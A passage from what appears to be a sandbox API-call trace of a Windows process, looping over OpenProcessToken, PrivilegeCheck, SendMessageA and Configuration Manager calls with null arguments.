pfResult=0x18fe54) returned 1 [0084.718] SetLastError (dwErrCode=0x522) [0084.718] CloseHandle (hObject=0x114) returned 1 [0084.718] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.718] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.719] GetLastError () returned 0x578 [0084.719] SetLastError (dwErrCode=0x578) [0084.719] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.719] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.719] GetCurrentThread () returned 0xfffffffe [0084.719] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.719] GetLastError () returned 0x3f0 [0084.719] GetCurrentProcess () returned 0xffffffff [0084.719] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.719] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.719] SetLastError (dwErrCode=0x522) [0084.719] CloseHandle (hObject=0x114) returned 1 [0084.719] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.719] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.719] GetLastError () returned 0x578 [0084.719] SetLastError (dwErrCode=0x578) [0084.719] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.719] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.719] GetCurrentThread () returned 0xfffffffe [0084.719] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.719] GetLastError () returned 0x3f0 [0084.719] GetCurrentProcess () returned 0xffffffff [0084.719] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.719] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.719] SetLastError (dwErrCode=0x522) [0084.719] CloseHandle (hObject=0x114) returned 1 [0084.719] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.719] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.719] GetLastError () returned 0x578 [0084.719] SetLastError (dwErrCode=0x578) [0084.719] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.719] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.719] GetCurrentThread () returned 0xfffffffe [0084.719] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.719] GetLastError () returned 0x3f0 [0084.719] GetCurrentProcess () returned 0xffffffff [0084.719] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.719] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.720] SetLastError (dwErrCode=0x522) [0084.720] CloseHandle (hObject=0x114) returned 1 [0084.720] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.720] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.720] GetLastError () returned 0x578 [0084.720] SetLastError (dwErrCode=0x578) [0084.720] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.720] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.720] GetCurrentThread () returned 0xfffffffe [0084.720] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.720] GetLastError () returned 0x3f0 [0084.720] GetCurrentProcess () returned 0xffffffff [0084.720] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.720] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.720] SetLastError (dwErrCode=0x522) [0084.720] CloseHandle (hObject=0x114) returned 1 [0084.720] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.720] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.720] GetLastError () returned 0x578 [0084.720] SetLastError (dwErrCode=0x578) [0084.720] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.720] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.720] GetCurrentThread () returned 0xfffffffe [0084.720] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.720] GetLastError () returned 0x3f0 [0084.720] GetCurrentProcess () returned 0xffffffff [0084.720] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.720] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.720] SetLastError (dwErrCode=0x522) [0084.720] CloseHandle (hObject=0x114) returned 1 [0084.720] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.720] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.720] GetLastError () returned 0x578 [0084.720] SetLastError (dwErrCode=0x578) [0084.720] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.720] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.721] GetCurrentThread () returned 0xfffffffe [0084.721] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.721] GetLastError () returned 0x3f0 [0084.721] GetCurrentProcess () returned 0xffffffff [0084.721] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.721] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.721] SetLastError (dwErrCode=0x522) [0084.721] CloseHandle (hObject=0x114) returned 1 [0084.721] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.721] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.721] GetLastError () returned 0x578 [0084.721] SetLastError (dwErrCode=0x578) [0084.721] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.721] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.721] GetCurrentThread () returned 0xfffffffe [0084.721] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.721] GetLastError () returned 0x3f0 [0084.721] GetCurrentProcess () returned 0xffffffff [0084.721] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.721] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.721] SetLastError (dwErrCode=0x522) [0084.721] CloseHandle (hObject=0x114) returned 1 [0084.721] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.721] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.721] GetLastError () returned 0x578 [0084.721] SetLastError (dwErrCode=0x578) [0084.721] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.721] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.721] GetCurrentThread () returned 0xfffffffe [0084.721] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.721] GetLastError () returned 0x3f0 [0084.721] GetCurrentProcess () returned 0xffffffff [0084.721] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.721] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.721] SetLastError (dwErrCode=0x522) [0084.721] CloseHandle (hObject=0x114) returned 1 [0084.722] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.722] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.722] GetLastError () returned 0x578 [0084.722] SetLastError (dwErrCode=0x578) [0084.722] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.722] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.722] GetCurrentThread () returned 0xfffffffe [0084.722] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.722] GetLastError () returned 0x3f0 [0084.722] GetCurrentProcess () returned 0xffffffff [0084.722] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.722] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.722] SetLastError (dwErrCode=0x522) [0084.722] CloseHandle (hObject=0x114) returned 1 [0084.722] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.722] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.722] GetLastError () returned 0x578 [0084.722] SetLastError (dwErrCode=0x578) [0084.722] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.722] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.722] GetCurrentThread () returned 0xfffffffe [0084.722] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.722] GetLastError () returned 0x3f0 [0084.722] GetCurrentProcess () returned 0xffffffff [0084.722] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.722] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.722] SetLastError (dwErrCode=0x522) [0084.722] CloseHandle (hObject=0x114) returned 1 [0084.722] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.722] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.722] GetLastError () returned 0x578 [0084.722] SetLastError (dwErrCode=0x578) [0084.722] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.722] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.722] GetCurrentThread () returned 0xfffffffe [0084.722] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.723] GetLastError () returned 0x3f0 [0084.723] GetCurrentProcess () returned 0xffffffff [0084.723] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.723] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.723] SetLastError (dwErrCode=0x522) [0084.723] CloseHandle (hObject=0x114) returned 1 [0084.723] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.723] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.723] GetLastError () returned 0x578 [0084.723] SetLastError (dwErrCode=0x578) [0084.723] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.723] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.723] GetCurrentThread () returned 0xfffffffe [0084.723] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.723] GetLastError () returned 0x3f0 [0084.723] GetCurrentProcess () returned 0xffffffff [0084.723] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.723] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.723] SetLastError (dwErrCode=0x522) [0084.723] CloseHandle (hObject=0x114) returned 1 [0084.723] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.723] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.723] GetLastError () returned 0x578 [0084.723] SetLastError (dwErrCode=0x578) [0084.723] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.723] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.723] GetCurrentThread () returned 0xfffffffe [0084.723] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.723] GetLastError () returned 0x3f0 [0084.723] GetCurrentProcess () returned 0xffffffff [0084.723] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.723] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.723] SetLastError (dwErrCode=0x522) [0084.723] CloseHandle (hObject=0x114) returned 1 [0084.723] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.723] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.723] GetLastError () returned 0x578 [0084.723] SetLastError (dwErrCode=0x578) [0084.723] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.723] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.724] GetCurrentThread () returned 0xfffffffe [0084.724] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.724] GetLastError () returned 0x3f0 [0084.724] GetCurrentProcess () returned 0xffffffff [0084.724] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.724] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.724] SetLastError (dwErrCode=0x522) [0084.724] CloseHandle (hObject=0x114) returned 1 [0084.724] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.724] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.724] GetLastError () returned 0x578 [0084.724] SetLastError (dwErrCode=0x578) [0084.724] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.724] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.724] GetCurrentThread () returned 0xfffffffe [0084.724] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.724] GetLastError () returned 0x3f0 [0084.724] GetCurrentProcess () returned 0xffffffff [0084.724] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.724] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.724] SetLastError (dwErrCode=0x522) [0084.724] CloseHandle (hObject=0x114) returned 1 [0084.724] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.724] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.724] GetLastError () returned 0x578 [0084.724] SetLastError (dwErrCode=0x578) [0084.724] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.724] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.724] GetCurrentThread () returned 0xfffffffe [0084.724] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.724] GetLastError () returned 0x3f0 [0084.724] GetCurrentProcess () returned 0xffffffff [0084.724] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.724] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.724] SetLastError (dwErrCode=0x522) [0084.724] CloseHandle (hObject=0x114) returned 1 [0084.724] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.724] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.724] GetLastError () returned 0x578 [0084.725] SetLastError (dwErrCode=0x578) [0084.725] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.725] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.725] GetCurrentThread () returned 0xfffffffe [0084.725] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.725] GetLastError () returned 0x3f0 [0084.725] GetCurrentProcess () returned 0xffffffff [0084.725] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.725] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.725] SetLastError (dwErrCode=0x522) [0084.725] CloseHandle (hObject=0x114) returned 1 [0084.725] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.725] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.725] GetLastError () returned 0x578 [0084.725] SetLastError (dwErrCode=0x578) [0084.725] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.725] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.725] GetCurrentThread () returned 0xfffffffe [0084.725] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.725] GetLastError () returned 0x3f0 [0084.725] GetCurrentProcess () returned 0xffffffff [0084.725] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.725] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.725] SetLastError (dwErrCode=0x522) [0084.725] CloseHandle (hObject=0x114) returned 1 [0084.725] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.725] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.725] GetLastError () returned 0x578 [0084.725] SetLastError (dwErrCode=0x578) [0084.725] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.725] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.725] GetCurrentThread () returned 0xfffffffe [0084.725] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.725] GetLastError () returned 0x3f0 [0084.725] GetCurrentProcess () returned 0xffffffff [0084.725] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.725] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.725] SetLastError (dwErrCode=0x522) [0084.725] CloseHandle (hObject=0x114) returned 1 [0084.725] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.726] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.726] GetLastError () returned 0x578 [0084.726] SetLastError (dwErrCode=0x578) [0084.726] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.726] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.726] GetCurrentThread () returned 0xfffffffe [0084.726] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.726] GetLastError () returned 0x3f0 [0084.726] GetCurrentProcess () returned 0xffffffff [0084.726] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.726] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.726] SetLastError (dwErrCode=0x522) [0084.726] CloseHandle (hObject=0x114) returned 1 [0084.726] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.726] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.726] GetLastError () returned 0x578 [0084.726] SetLastError (dwErrCode=0x578) [0084.726] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.726] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.726] GetCurrentThread () returned 0xfffffffe [0084.726] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.726] GetLastError () returned 0x3f0 [0084.726] GetCurrentProcess () returned 0xffffffff [0084.726] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.726] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.726] SetLastError (dwErrCode=0x522) [0084.726] CloseHandle (hObject=0x114) returned 1 [0084.726] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.726] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, 